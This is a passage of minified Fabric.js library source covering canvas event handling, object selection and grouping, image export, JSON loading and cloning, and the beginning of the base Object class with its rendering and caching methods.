this._unwindGroupTransformOnObject(y,D),w},_realizeGroupTransformOnObject:function(y){if(y.group&&"activeSelection"===y.group.type&&this._activeObject===y.group){var p={};return["angle","flipX","flipY","left","scaleX","scaleY","skewX","skewY","top"].forEach(function(D){p[D]=y[D]}),j.util.addTransformToObject(y,this._activeObject.calcOwnMatrix()),p}return null},_unwindGroupTransformOnObject:function(y,M){M&&y.set(M)},_setSVGObject:function(y,M,p){var D=this._realizeGroupTransformOnObject(M);this.callSuper("_setSVGObject",y,M,p),this._unwindGroupTransformOnObject(M,D)},setViewportTransform:function(y){this.renderOnAddRemove&&this._activeObject&&this._activeObject.isEditing&&this._activeObject.clearContextTop(),j.StaticCanvas.prototype.setViewportTransform.call(this,y)}}),j.StaticCanvas)"prototype"!==_&&(j.Canvas[_]=j.StaticCanvas[_])}(),function(){var E=j.util.addListener,g=j.util.removeListener,M={passive:!1};function p(D,w){return D.button&&D.button===w-1}j.util.object.extend(j.Canvas.prototype,{mainTouchId:null,_initEventListeners:function(){this.removeListeners(),this._bindEvents(),this.addOrRemove(E,"add")},_getEventPrefix:function(){return this.enablePointerEvents?"pointer":"mouse"},addOrRemove:function(D,w){var x=this.upperCanvasEl,S=this._getEventPrefix();D(j.window,"resize",this._onResize),D(x,S+"down",this._onMouseDown),D(x,S+"move",this._onMouseMove,M),D(x,S+"out",this._onMouseOut),D(x,S+"enter",this._onMouseEnter),D(x,"wheel",this._onMouseWheel),D(x,"contextmenu",this._onContextMenu),D(x,"dblclick",this._onDoubleClick),D(x,"dragover",this._onDragOver),D(x,"dragenter",this._onDragEnter),D(x,"dragleave",this._onDragLeave),D(x,"drop",this._onDrop),this.enablePointerEvents||D(x,"touchstart",this._onTouchStart,M),"undefined"!=typeof eventjs&&w in eventjs&&(eventjs[w](x,"gesture",this._onGesture),eventjs[w](x,"drag",this._onDrag),eventjs[w](x,"orientation",this._onOrientationChange),eventjs[w](x,"shake",this._onShake),eventjs[w](x,"longpress",this._onLongPress))},removeListeners:function(){this.addOrRemove(g,"remove");var D=this._getEventPrefix();g(j.document,D+"up",this._onMouseUp),g(j.document,"touchend",this._onTouchEnd,M),g(j.document,D+"move",this._onMouseMove,M),g(j.document,"touchmove",this._onMouseMove,M)},_bindEvents:function(){this.eventsBound||(this._onMouseDown=this._onMouseDown.bind(this),this._onTouchStart=this._onTouchStart.bind(this),this._onMouseMove=this._onMouseMove.bind(this),this._onMouseUp=this._onMouseUp.bind(this),this._onTouchEnd=this._onTouchEnd.bind(this),this._onResize=this._onResize.bind(this),this._onGesture=this._onGesture.bind(this),this._onDrag=this._onDrag.bind(this),this._onShake=this._onShake.bind(this),this._onLongPress=this._onLongPress.bind(this),this._onOrientationChange=this._onOrientationChange.bind(this),this._onMouseWheel=this._onMouseWheel.bind(this),this._onMouseOut=this._onMouseOut.bind(this),this._onMouseEnter=this._onMouseEnter.bind(this),this._onContextMenu=this._onContextMenu.bind(this),this._onDoubleClick=this._onDoubleClick.bind(this),this._onDragOver=this._onDragOver.bind(this),this._onDragEnter=this._simpleEventHandler.bind(this,"dragenter"),this._onDragLeave=this._simpleEventHandler.bind(this,"dragleave"),this._onDrop=this._onDrop.bind(this),this.eventsBound=!0)},_onGesture:function(D,w){this.__onTransformGesture&&this.__onTransformGesture(D,w)},_onDrag:function(D,w){this.__onDrag&&this.__onDrag(D,w)},_onMouseWheel:function(D){this.__onMouseWheel(D)},_onMouseOut:function(D){var w=this._hoveredTarget;this.fire("mouse:out",{target:w,e:D}),this._hoveredTarget=null,w&&w.fire("mouseout",{e:D});var x=this;this._hoveredTargets.forEach(function(S){x.fire("mouse:out",{target:w,e:D}),S&&w.fire("mouseout",{e:D})}),this._hoveredTargets=[]},_onMouseEnter:function(D){!this._currentTransform&&!this.findTarget(D)&&(this.fire("mouse:over",{target:null,e:D}),this._hoveredTarget=null,this._hoveredTargets=[])},_onOrientationChange:function(D,w){this.__onOrientationChange&&this.__onOrientationChange(D,w)},_onShake:function(D,w){this.__onShake&&this.__onShake(D,w)},_onLongPress:function(D,w){this.__onLongPress&&this.__onLongPress(D,w)},_onDragOver:function(D){D.preventDefault();var w=this._simpleEventHandler("dragover",D);this._fireEnterLeaveEvents(w,D)},_onDrop:function(D){return this._simpleEventHandler("drop:before",D),this._simpleEventHandler("drop",D)},_onContextMenu:function(D){return this.stopContextMenu&&(D.stopPropagation(),D.preventDefault()),!1},_onDoubleClick:function(D){this._cacheTransformEventData(D),this._handleEvent(D,"dblclick"),this._resetTransformEventData(D)},getPointerId:function(D){var w=D.changedTouches;return w?w[0]&&w[0].identifier:this.enablePointerEvents?D.pointerId:-1},_isMainEvent:function(D){return!0===D.isPrimary||!1!==D.isPrimary&&("touchend"===D.type&&0===D.touches.length||!D.changedTouches||D.changedTouches[0].identifier===this.mainTouchId)},_onTouchStart:function(D){D.preventDefault(),null===this.mainTouchId&&(this.mainTouchId=this.getPointerId(D)),this.__onMouseDown(D),this._resetTransformEventData();var w=this.upperCanvasEl,x=this._getEventPrefix();E(j.document,"touchend",this._onTouchEnd,M),E(j.document,"touchmove",this._onMouseMove,M),g(w,x+"down",this._onMouseDown)},_onMouseDown:function(D){this.__onMouseDown(D),this._resetTransformEventData();var w=this.upperCanvasEl,x=this._getEventPrefix();g(w,x+"move",this._onMouseMove,M),E(j.document,x+"up",this._onMouseUp),E(j.document,x+"move",this._onMouseMove,M)},_onTouchEnd:function(D){if(!(D.touches.length>0)){this.__onMouseUp(D),this._resetTransformEventData(),this.mainTouchId=null;var w=this._getEventPrefix();g(j.document,"touchend",this._onTouchEnd,M),g(j.document,"touchmove",this._onMouseMove,M);var x=this;this._willAddMouseDown&&clearTimeout(this._willAddMouseDown),this._willAddMouseDown=setTimeout(function(){E(x.upperCanvasEl,w+"down",x._onMouseDown),x._willAddMouseDown=0},400)}},_onMouseUp:function(D){this.__onMouseUp(D),this._resetTransformEventData();var w=this.upperCanvasEl,x=this._getEventPrefix();this._isMainEvent(D)&&(g(j.document,x+"up",this._onMouseUp),g(j.document,x+"move",this._onMouseMove,M),E(w,x+"move",this._onMouseMove,M))},_onMouseMove:function(D){!this.allowTouchScrolling&&D.preventDefault&&D.preventDefault(),this.__onMouseMove(D)},_onResize:function(){this.calcOffset()},_shouldRender:function(D){var w=this._activeObject;return!!(!!w!=!!D||w&&D&&w!==D)},__onMouseUp:function(D){var w,x=this._currentTransform,S=this._groupSelector,O=!1,U=!S||0===S.left&&0===S.top;if(this._cacheTransformEventData(D),w=this._target,this._handleEvent(D,"up:before"),p(D,3))this.fireRightClick&&this._handleEvent(D,"up",3,U);else{if(p(D,2))return this.fireMiddleClick&&this._handleEvent(D,"up",2,U),void this._resetTransformEventData();if(this.isDrawingMode&&this._isCurrentlyDrawing)this._onMouseUpInDrawingMode(D);else if(this._isMainEvent(D)){if(x&&(this._finalizeCurrentTransform(D),O=x.actionPerformed),!U){var K=w===this._activeObject;this._maybeGroupObjects(D),O||(O=this._shouldRender(w)||!K&&w===this._activeObject)}var ee,se;if(w){if(ee=w._findTargetCorner(this.getPointer(D,!0),j.util.isTouchEvent(D)),w.selectable&&w!==this._activeObject&&"up"===w.activeOn)this.setActiveObject(w,D),O=!0;else{var ve=w.controls[ee],le=ve&&ve.getMouseUpHandler(D,w,ve);le&&le(D,x,(se=this.getPointer(D)).x,se.y)}w.isMoving=!1}if(x&&(x.target!==w||x.corner!==ee)){var ye=x.target&&x.target.controls[x.corner],z=ye&&ye.getMouseUpHandler(D,w,ve);se=se||this.getPointer(D),z&&z(D,x,se.x,se.y)}this._setCursorFromEvent(D,w),this._handleEvent(D,"up",1,U),this._groupSelector=null,this._currentTransform=null,w&&(w.__corner=0),O?this.requestRenderAll():U||this.renderTop()}}},_simpleEventHandler:function(D,w){var x=this.findTarget(w),S=this.targets,O={e:w,target:x,subTargets:S};if(this.fire(D,O),x&&x.fire(D,O),!S)return x;for(var U=0;U<S.length;U++)S[U].fire(D,O);return x},_handleEvent:function(D,w,x,S){var O=this._target,U=this.targets||[],K={e:D,target:O,subTargets:U,button:x||1,isClick:S||!1,pointer:this._pointer,absolutePointer:this._absolutePointer,transform:this._currentTransform};"up"===w&&(K.currentTarget=this.findTarget(D),K.currentSubTargets=this.targets),this.fire("mouse:"+w,K),O&&O.fire("mouse"+w,K);for(var ee=0;ee<U.length;ee++)U[ee].fire("mouse"+w,K)},_finalizeCurrentTransform:function(D){var w=this._currentTransform,x=w.target,S={e:D,target:x,transform:w,action:w.action};x._scaling&&(x._scaling=!1),x.setCoords(),(w.actionPerformed||this.stateful&&x.hasStateChanged())&&this._fire("modified",S)},_onMouseDownInDrawingMode:function(D){this._isCurrentlyDrawing=!0,this.getActiveObject()&&this.discardActiveObject(D).requestRenderAll();var w=this.getPointer(D);this.freeDrawingBrush.onMouseDown(w,{e:D,pointer:w}),this._handleEvent(D,"down")},_onMouseMoveInDrawingMode:function(D){if(this._isCurrentlyDrawing){var w=this.getPointer(D);this.freeDrawingBrush.onMouseMove(w,{e:D,pointer:w})}this.setCursor(this.freeDrawingCursor),this._handleEvent(D,"move")},_onMouseUpInDrawingMode:function(D){var w=this.getPointer(D);this._isCurrentlyDrawing=this.freeDrawingBrush.onMouseUp({e:D,pointer:w}),this._handleEvent(D,"up")},__onMouseDown:function(D){this._cacheTransformEventData(D),this._handleEvent(D,"down:before");var w=this._target;if(p(D,3))this.fireRightClick&&this._handleEvent(D,"down",3);else if(p(D,2))this.fireMiddleClick&&this._handleEvent(D,"down",2);else if(this.isDrawingMode)this._onMouseDownInDrawingMode(D);else if(this._isMainEvent(D)&&!this._currentTransform){this._previousPointer=x=this._pointer;var S=this._shouldRender(w),O=this._shouldGroup(D,w);if(this._shouldClearSelection(D,w)?this.discardActiveObject(D):O&&(this._handleGrouping(D,w),w=this._activeObject),this.selection&&(!w||!w.selectable&&!w.isEditing&&w!==this._activeObject)&&(this._groupSelector={ex:this._absolutePointer.x,ey:this._absolutePointer.y,top:0,left:0}),w){var U=w===this._activeObject;w.selectable&&"down"===w.activeOn&&this.setActiveObject(w,D);var K=w._findTargetCorner(this.getPointer(D,!0),j.util.isTouchEvent(D));if(w.__corner=K,w===this._activeObject&&(K||!O)){this._setupCurrentTransform(D,w,U);var ee=w.controls[K],x=this.getPointer(D),se=ee&&ee.getMouseDownHandler(D,w,ee);se&&se(D,this._currentTransform,x.x,x.y)}}this._handleEvent(D,"down"),(S||O)&&this.requestRenderAll()}},_resetTransformEventData:function(){this._target=null,this._pointer=null,this._absolutePointer=null},_cacheTransformEventData:function(D){this._resetTransformEventData(),this._pointer=this.getPointer(D,!0),this._absolutePointer=this.restorePointerVpt(this._pointer),this._target=this._currentTransform?this._currentTransform.target:this.findTarget(D)||null},_beforeTransform:function(D){var w=this._currentTransform;this.stateful&&w.target.saveState(),this.fire("before:transform",{e:D,transform:w})},__onMouseMove:function(D){var w,x;if(this._handleEvent(D,"move:before"),this._cacheTransformEventData(D),this.isDrawingMode)this._onMouseMoveInDrawingMode(D);else if(this._isMainEvent(D)){var S=this._groupSelector;S?(S.left=(x=this._absolutePointer).x-S.ex,S.top=x.y-S.ey,this.renderTop()):this._currentTransform?this._transformObject(D):(w=this.findTarget(D)||null,this._setCursorFromEvent(D,w),this._fireOverOutEvents(w,D)),this._handleEvent(D,"move"),this._resetTransformEventData()}},_fireOverOutEvents:function(D,w){var x=this._hoveredTarget,S=this._hoveredTargets,O=this.targets,U=Math.max(S.length,O.length);this.fireSyntheticInOutEvents(D,w,{oldTarget:x,evtOut:"mouseout",canvasEvtOut:"mouse:out",evtIn:"mouseover",canvasEvtIn:"mouse:over"});for(var K=0;K<U;K++)this.fireSyntheticInOutEvents(O[K],w,{oldTarget:S[K],evtOut:"mouseout",evtIn:"mouseover"});this._hoveredTarget=D,this._hoveredTargets=this.targets.concat()},_fireEnterLeaveEvents:function(D,w){var x=this._draggedoverTarget,S=this._hoveredTargets,O=this.targets,U=Math.max(S.length,O.length);this.fireSyntheticInOutEvents(D,w,{oldTarget:x,evtOut:"dragleave",evtIn:"dragenter"});for(var K=0;K<U;K++)this.fireSyntheticInOutEvents(O[K],w,{oldTarget:S[K],evtOut:"dragleave",evtIn:"dragenter"});this._draggedoverTarget=D},fireSyntheticInOutEvents:function(D,w,x){var S,O,ee,U=x.oldTarget,se=U!==D,ve=x.canvasEvtIn,le=x.canvasEvtOut;se&&(S={e:w,target:D,previousTarget:U},O={e:w,target:U,nextTarget:D}),ee=D&&se,U&&se&&(le&&this.fire(le,O),U.fire(x.evtOut,O)),ee&&(ve&&this.fire(ve,S),D.fire(x.evtIn,S))},__onMouseWheel:function(D){this._cacheTransformEventData(D),this._handleEvent(D,"wheel"),this._resetTransformEventData()},_transformObject:function(D){var w=this.getPointer(D),x=this._currentTransform;x.reset=!1,x.shiftKey=D.shiftKey,x.altKey=D[this.centeredKey],this._performTransformAction(D,x,w),x.actionPerformed&&this.requestRenderAll()},_performTransformAction:function(D,w,x){var U=w.action,K=!1,ee=w.actionHandler;ee&&(K=ee(D,w,x.x,x.y)),"drag"===U&&K&&(w.target.isMoving=!0,this.setCursor(w.target.moveCursor||this.moveCursor)),w.actionPerformed=w.actionPerformed||K},_fire:j.controlsUtils.fireEvent,_setCursorFromEvent:function(D,w){if(!w)return this.setCursor(this.defaultCursor),!1;var x=w.hoverCursor||this.hoverCursor,S=this._activeObject&&"activeSelection"===this._activeObject.type?this._activeObject:null,O=(!S||!S.contains(w))&&w._findTargetCorner(this.getPointer(D,!0));O?this.setCursor(this.getCornerCursor(O,w,D)):(w.subTargetCheck&&this.targets.concat().reverse().map(function(U){x=U.hoverCursor||x}),this.setCursor(x))},getCornerCursor:function(D,w,x){var S=w.controls[D];return S.cursorStyleHandler(x,S,w)}})}(),function(){var E=Math.min,g=Math.max;j.util.object.extend(j.Canvas.prototype,{_shouldGroup:function(b,_){var y=this._activeObject;return y&&this._isSelectionKeyPressed(b)&&_&&_.selectable&&this.selection&&(y!==_||"activeSelection"===y.type)&&!_.onSelect({e:b})},_handleGrouping:function(b,_){var y=this._activeObject;y.__corner||_===y&&(!(_=this.findTarget(b,!0))||!_.selectable)||(y&&"activeSelection"===y.type?this._updateActiveSelection(_,b):this._createActiveSelection(_,b))},_updateActiveSelection:function(b,_){var y=this._activeObject,M=y._objects.slice(0);y.contains(b)?(y.removeWithUpdate(b),this._hoveredTarget=b,this._hoveredTargets=this.targets.concat(),1===y.size()&&this._setActiveObject(y.item(0),_)):(y.addWithUpdate(b),this._hoveredTarget=y,this._hoveredTargets=this.targets.concat()),this._fireSelectionEvents(M,_)},_createActiveSelection:function(b,_){var y=this.getActiveObjects(),M=this._createGroup(b);this._hoveredTarget=M,this._setActiveObject(M,_),this._fireSelectionEvents(y,_)},_createGroup:function(b){var _=this._objects,M=_.indexOf(this._activeObject)<_.indexOf(b)?[this._activeObject,b]:[b,this._activeObject];return this._activeObject.isEditing&&this._activeObject.exitEditing(),new j.ActiveSelection(M,{canvas:this})},_groupSelectedObjects:function(b){var y,_=this._collectObjects(b);1===_.length?this.setActiveObject(_[0],b):_.length>1&&(y=new j.ActiveSelection(_.reverse(),{canvas:this}),this.setActiveObject(y,b))},_collectObjects:function(b){for(var y,_=[],M=this._groupSelector.ex,p=this._groupSelector.ey,D=M+this._groupSelector.left,w=p+this._groupSelector.top,x=new j.Point(E(M,D),E(p,w)),S=new j.Point(g(M,D),g(p,w)),O=!this.selectionFullyContained,U=M===D&&p===w,K=this._objects.length;K--&&!((y=this._objects[K])&&y.selectable&&y.visible&&(O&&y.intersectsWithRect(x,S,!0)||y.isContainedWithinRect(x,S,!0)||O&&y.containsPoint(x,null,!0)||O&&y.containsPoint(S,null,!0))&&(_.push(y),U)););return _.length>1&&(_=_.filter(function(ee){return!ee.onSelect({e:b})})),_},_maybeGroupObjects:function(b){this.selection&&this._groupSelector&&this._groupSelectedObjects(b),this.setCursor(this.defaultCursor),this._groupSelector=null}})}(),j.util.object.extend(j.StaticCanvas.prototype,{toDataURL:function(E){E||(E={});var g=E.format||"png",b=E.quality||1,_=(E.multiplier||1)*(E.enableRetinaScaling?this.getRetinaScaling():1),y=this.toCanvasElement(_,E);return j.util.toDataURL(y,g,b)},toCanvasElement:function(E,g){var b=((g=g||{}).width||this.width)*(E=E||1),_=(g.height||this.height)*E,y=this.getZoom(),M=this.width,p=this.height,D=y*E,w=this.viewportTransform,O=this.interactive,U=[D,0,0,D,(w[4]-(g.left||0))*E,(w[5]-(g.top||0))*E],K=this.enableRetinaScaling,ee=j.util.createCanvasElement(),se=this.contextTop;return ee.width=b,ee.height=_,this.contextTop=null,this.enableRetinaScaling=!1,this.interactive=!1,this.viewportTransform=U,this.width=b,this.height=_,this.calcViewportBoundaries(),this.renderCanvas(ee.getContext("2d"),this._objects),this.viewportTransform=w,this.width=M,this.height=p,this.calcViewportBoundaries(),this.interactive=O,this.enableRetinaScaling=K,this.contextTop=se,ee}}),j.util.object.extend(j.StaticCanvas.prototype,{loadFromJSON:function(E,g,b){if(E){var _="string"==typeof E?JSON.parse(E):j.util.object.clone(E),y=this,M=_.clipPath,p=this.renderOnAddRemove;return this.renderOnAddRemove=!1,delete _.clipPath,this._enlivenObjects(_.objects,function(D){y.clear(),y._setBgOverlay(_,function(){M?y._enlivenObjects([M],function(w){y.clipPath=w[0],y.__setupCanvas.call(y,_,D,p,g)}):y.__setupCanvas.call(y,_,D,p,g)})},b),this}},__setupCanvas:function(E,g,b,_){var y=this;g.forEach(function(M,p){y.insertAt(M,p)}),this.renderOnAddRemove=b,delete E.objects,delete E.backgroundImage,delete E.overlayImage,delete E.background,delete E.overlay,this._setOptions(E),this.renderAll(),_&&_()},_setBgOverlay:function(E,g){var b={backgroundColor:!1,overlayColor:!1,backgroundImage:!1,overlayImage:!1};if(E.backgroundImage||E.overlayImage||E.background||E.overlay){var _=function(){b.backgroundImage&&b.overlayImage&&b.backgroundColor&&b.overlayColor&&g&&g()};this.__setBgOverlay("backgroundImage",E.backgroundImage,b,_),this.__setBgOverlay("overlayImage",E.overlayImage,b,_),this.__setBgOverlay("backgroundColor",E.background,b,_),this.__setBgOverlay("overlayColor",E.overlay,b,_)}else g&&g()},__setBgOverlay:function(E,g,b,_){var y=this;if(!g)return b[E]=!0,void(_&&_());"backgroundImage"===E||"overlayImage"===E?j.util.enlivenObjects([g],function(M){y[E]=M[0],b[E]=!0,_&&_()}):this["set"+j.util.string.capitalize(E,!0)](g,function(){b[E]=!0,_&&_()})},_enlivenObjects:function(E,g,b){E&&0!==E.length?j.util.enlivenObjects(E,function(_){g&&g(_)},null,b):g&&g([])},_toDataURL:function(E,g){this.clone(function(b){g(b.toDataURL(E))})},_toDataURLWithMultiplier:function(E,g,b){this.clone(function(_){b(_.toDataURLWithMultiplier(E,g))})},clone:function(E,g){var b=JSON.stringify(this.toJSON(g));this.cloneWithoutData(function(_){_.loadFromJSON(b,function(){E&&E(_)})})},cloneWithoutData:function(E){var g=j.util.createCanvasElement();g.width=this.width,g.height=this.height;var b=new j.Canvas(g);this.backgroundImage?(b.setBackgroundImage(this.backgroundImage.src,function(){b.renderAll(),E&&E(b)}),b.backgroundImageOpacity=this.backgroundImageOpacity,b.backgroundImageStretch=this.backgroundImageStretch):E&&E(b)}}),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.object.extend,_=g.util.object.clone,y=g.util.toFixed,M=g.util.string.capitalize,p=g.util.degreesToRadians;g.Object||(g.Object=g.util.createClass(g.CommonMethods,{type:"object",originX:"left",originY:"top",top:0,left:0,width:0,height:0,scaleX:1,scaleY:1,flipX:!1,flipY:!1,opacity:1,angle:0,skewX:0,skewY:0,cornerSize:13,touchCornerSize:24,transparentCorners:!0,hoverCursor:null,moveCursor:null,padding:0,borderColor:"rgb(178,204,255)",borderDashArray:null,cornerColor:"rgb(178,204,255)",cornerStrokeColor:null,cornerStyle:"rect",cornerDashArray:null,centeredScaling:!1,centeredRotation:!0,fill:"rgb(0,0,0)",fillRule:"nonzero",globalCompositeOperation:"source-over",backgroundColor:"",selectionBackgroundColor:"",stroke:null,strokeWidth:1,strokeDashArray:null,strokeDashOffset:0,strokeLineCap:"butt",strokeLineJoin:"miter",strokeMiterLimit:4,shadow:null,borderOpacityWhenMoving:.4,borderScaleFactor:1,minScaleLimit:0,selectable:!0,evented:!0,visible:!0,hasControls:!0,hasBorders:!0,perPixelTargetFind:!1,includeDefaultValues:!0,lockMovementX:!1,lockMovementY:!1,lockRotation:!1,lockScalingX:!1,lockScalingY:!1,lockSkewingX:!1,lockSkewingY:!1,lockScalingFlip:!1,excludeFromExport:!1,objectCaching:!g.isLikelyNode,statefullCache:!1,noScaleCache:!0,strokeUniform:!1,dirty:!0,__corner:0,paintFirst:"fill",activeOn:"down",stateProperties:"top left width height scaleX scaleY flipX flipY originX originY transformMatrix stroke strokeWidth strokeDashArray strokeLineCap strokeDashOffset strokeLineJoin strokeMiterLimit angle opacity fill globalCompositeOperation shadow visible backgroundColor skewX skewY fillRule paintFirst clipPath strokeUniform".split(" "),cacheProperties:"fill stroke strokeWidth strokeDashArray width height paintFirst strokeUniform strokeLineCap strokeDashOffset strokeLineJoin strokeMiterLimit backgroundColor clipPath".split(" "),colorProperties:"fill stroke backgroundColor".split(" "),clipPath:void 0,inverted:!1,absolutePositioned:!1,initialize:function(x){x&&this.setOptions(x)},_createCacheCanvas:function(){this._cacheProperties={},this._cacheCanvas=g.util.createCanvasElement(),this._cacheContext=this._cacheCanvas.getContext("2d"),this._updateCacheCanvas(),this.dirty=!0},_limitCacheSize:function(x){var S=g.perfLimitSizeTotal,O=x.width,U=x.height,K=g.maxCacheSideLimit,ee=g.minCacheSideLimit;if(O<=K&&U<=K&&O*U<=S)return O<ee&&(x.width=ee),U<ee&&(x.height=ee),x;var ve=g.util.limitDimsByArea(O/U,S),le=g.util.capValue,ye=le(ee,ve.x,K),z=le(ee,ve.y,K);return O>ye&&(x.zoomX/=O/ye,x.width=ye,x.capped=!0),U>z&&(x.zoomY/=U/z,x.height=z,x.capped=!0),x},_getCacheCanvasDimensions:function(){var x=this.getTotalObjectScaling(),S=this._getTransformedDimensions(0,0),O=S.x*x.scaleX/this.scaleX,U=S.y*x.scaleY/this.scaleY;return{width:O+2,height:U+2,zoomX:x.scaleX,zoomY:x.scaleY,x:O,y:U}},_updateCacheCanvas:function(){var x=this.canvas;if(this.noScaleCache&&x&&x._currentTransform){var O=x._currentTransform.action;if(this===x._currentTransform.target&&O.slice&&"scale"===O.slice(0,5))return!1}var le,ye,U=this._cacheCanvas,K=this._limitCacheSize(this._getCacheCanvasDimensions()),ee=g.minCacheSideLimit,se=K.width,ve=K.height,z=K.zoomX,l=K.zoomY,f=se!==this.cacheWidth||ve!==this.cacheHeight,v=f||this.zoomX!==z||this.zoomY!==l,P=0,G=0,X=!1;if(f){var L=this._cacheCanvas.width,h=this._cacheCanvas.height,R=se>L||ve>h;X=R||(se<.9*L||ve<.9*h)&&L>ee&&h>ee,R&&!K.capped&&(se>ee||ve>ee)&&(P=.1*se,G=.1*ve)}return this instanceof g.Text&&this.path&&(v=!0,X=!0,P+=this.getHeightOfLine(0)*this.zoomX,G+=this.getHeightOfLine(0)*this.zoomY),!!v&&(X?(U.width=Math.ceil(se+P),U.height=Math.ceil(ve+G)):(this._cacheContext.setTransform(1,0,0,1,0,0),this._cacheContext.clearRect(0,0,U.width,U.height)),le=K.x/2,ye=K.y/2,this.cacheTranslationX=Math.round(U.width/2-le)+le,this.cacheTranslationY=Math.round(U.height/2-ye)+ye,this.cacheWidth=se,this.cacheHeight=ve,this._cacheContext.translate(this.cacheTranslationX,this.cacheTranslationY),this._cacheContext.scale(z,l),this.zoomX=z,this.zoomY=l,!0)},setOptions:function(x){this._setOptions(x),this._initGradient(x.fill,"fill"),this._initGradient(x.stroke,"stroke"),this._initPattern(x.fill,"fill"),this._initPattern(x.stroke,"stroke")},transform:function(x){var O=this.calcTransformMatrix(!(this.group&&!this.group._transformDone||this.group&&this.canvas&&x===this.canvas.contextTop));x.transform(O[0],O[1],O[2],O[3],O[4],O[5])},toObject:function(x){var S=g.Object.NUM_FRACTION_DIGITS,O={type:this.type,version:g.version,originX:this.originX,originY:this.originY,left:y(this.left,S),top:y(this.top,S),width:y(this.width,S),height:y(this.height,S),fill:this.fill&&this.fill.toObject?this.fill.toObject():this.fill,stroke:this.stroke&&this.stroke.toObject?this.stroke.toObject():this.stroke,strokeWidth:y(this.strokeWidth,S),strokeDashArray:this.strokeDashArray?this.strokeDashArray.concat():this.strokeDashArray,strokeLineCap:this.strokeLineCap,strokeDashOffset:this.strokeDashOffset,strokeLineJoin:this.strokeLineJoin,strokeUniform:this.strokeUniform,strokeMiterLimit:y(this.strokeMiterLimit,S),scaleX:y(this.scaleX,S),scaleY:y(this.scaleY,S),angle:y(this.angle,S),flipX:this.flipX,flipY:this.flipY,opacity:y(this.opacity,S),shadow:this.shadow&&this.shadow.toObject?this.shadow.toObject():this.shadow,visible:this.visible,backgroundColor:this.backgroundColor,fillRule:this.fillRule,paintFirst:this.paintFirst,globalCompositeOperation:this.globalCompositeOperation,skewX:y(this.skewX,S),skewY:y(this.skewY,S)};return this.clipPath&&!this.clipPath.excludeFromExport&&(O.clipPath=this.clipPath.toObject(x),O.clipPath.inverted=this.clipPath.inverted,O.clipPath.absolutePositioned=this.clipPath.absolutePositioned),g.util.populateWithProperties(this,O,x),this.includeDefaultValues||(O=this._removeDefaultValues(O)),O},toDatalessObject:function(x){return this.toObject(x)},_removeDefaultValues:function(x){var S=g.util.getKlass(x.type).prototype;return S.stateProperties.forEach(function(U){"left"===U||"top"===U||(x[U]===S[U]&&delete x[U],Array.isArray(x[U])&&Array.isArray(S[U])&&0===x[U].length&&0===S[U].length&&delete x[U])}),x},toString:function(){return"#<fabric."+M(this.type)+">"},getObjectScaling:function(){if(!this.group)return{scaleX:this.scaleX,scaleY:this.scaleY};var x=g.util.qrDecompose(this.calcTransformMatrix());return{scaleX:Math.abs(x.scaleX),scaleY:Math.abs(x.scaleY)}},getTotalObjectScaling:function(){var x=this.getObjectScaling(),S=x.scaleX,O=x.scaleY;if(this.canvas){var U=this.canvas.getZoom(),K=this.canvas.getRetinaScaling();S*=U*K,O*=U*K}return{scaleX:S,scaleY:O}},getObjectOpacity:function(){var x=this.opacity;return this.group&&(x*=this.group.getObjectOpacity()),x},_set:function(x,S){var U=this[x]!==S,K=!1;return("scaleX"===x||"scaleY"===x)&&(S=this._constrainScale(S)),"scaleX"===x&&S<0?(this.flipX=!this.flipX,S*=-1):"scaleY"===x&&S<0?(this.flipY=!this.flipY,S*=-1):"shadow"!==x||!S||S instanceof g.Shadow?"dirty"===x&&this.group&&this.group.set("dirty",S):S=new g.Shadow(S),this[x]=S,U&&(K=this.group&&this.group.isOnACache(),this.cacheProperties.indexOf(x)>-1?(this.dirty=!0,K&&this.group.set("dirty",!0)):K&&this.stateProperties.indexOf(x)>-1&&this.group.set("dirty",!0)),this},setOnGroup:function(){},getViewportTransform:function(){return this.canvas&&this.canvas.viewportTransform?this.canvas.viewportTransform:g.iMatrix.concat()},isNotVisible:function(){return 0===this.opacity||!this.width&&!this.height&&0===this.strokeWidth||!this.visible},render:function(x){this.isNotVisible()||this.canvas&&this.canvas.skipOffscreen&&!this.group&&!this.isOnScreen()||(x.save(),this._setupCompositeOperation(x),this.drawSelectionBackground(x),this.transform(x),this._setOpacity(x),this._setShadow(x,this),this.shouldCache()?(this.renderCache(),this.drawCacheOnCanvas(x)):(this._removeCacheCanvas(),this.dirty=!1,this.drawObject(x),this.objectCaching&&this.statefullCache&&this.saveState({propertySet:"cacheProperties"})),x.restore())},renderCache:function(x){x=x||{},(!this._cacheCanvas||!this._cacheContext)&&this._createCacheCanvas(),this.isCacheDirty()&&(this.statefullCache&&this.saveState({propertySet:"cacheProperties"}),this.drawObject(this._cacheContext,x.forClipping),this.dirty=!1)},_removeCacheCanvas:function(){this._cacheCanvas=null,this._cacheContext=null,this.cacheWidth=0,this.cacheHeight=0},hasStroke:function(){return this.stroke&&"transparent"!==this.stroke&&0!==this.strokeWidth},hasFill:function(){return this.fill&&"transparent"!==this.fill},needsItsOwnCache:function(){return!!("stroke"===this.paintFirst&&this.hasFill()&&this.hasStroke()&&"object"==typeof this.shadow||this.clipPath)},shouldCache:function(){return this.ownCaching=this.needsItsOwnCache()||this.objectCaching&&(!this.group||!this.group.isOnACache()),this.ownCaching},willDrawShadow:function(){return!!this.shadow&&(0!==this.shadow.offsetX||0!==this.shadow.offsetY)},drawClipPathOnCache:function(x,S){if(x.save(),x.globalCompositeOperation=S.inverted?"destination-out":"destination-in",S.absolutePositioned){var O=g.util.invertTransform(this.calcTransformMatrix());x.transform(O[0],O[1],O[2],O[3],O[4],O[5])}S.transform(x),x.scale(1/S.zoomX,1/S.zoomY),x.drawImage(S._cacheCanvas,-S.cacheTranslationX,-S.cacheTranslationY),x.restore()},drawObject:function(x,S){var 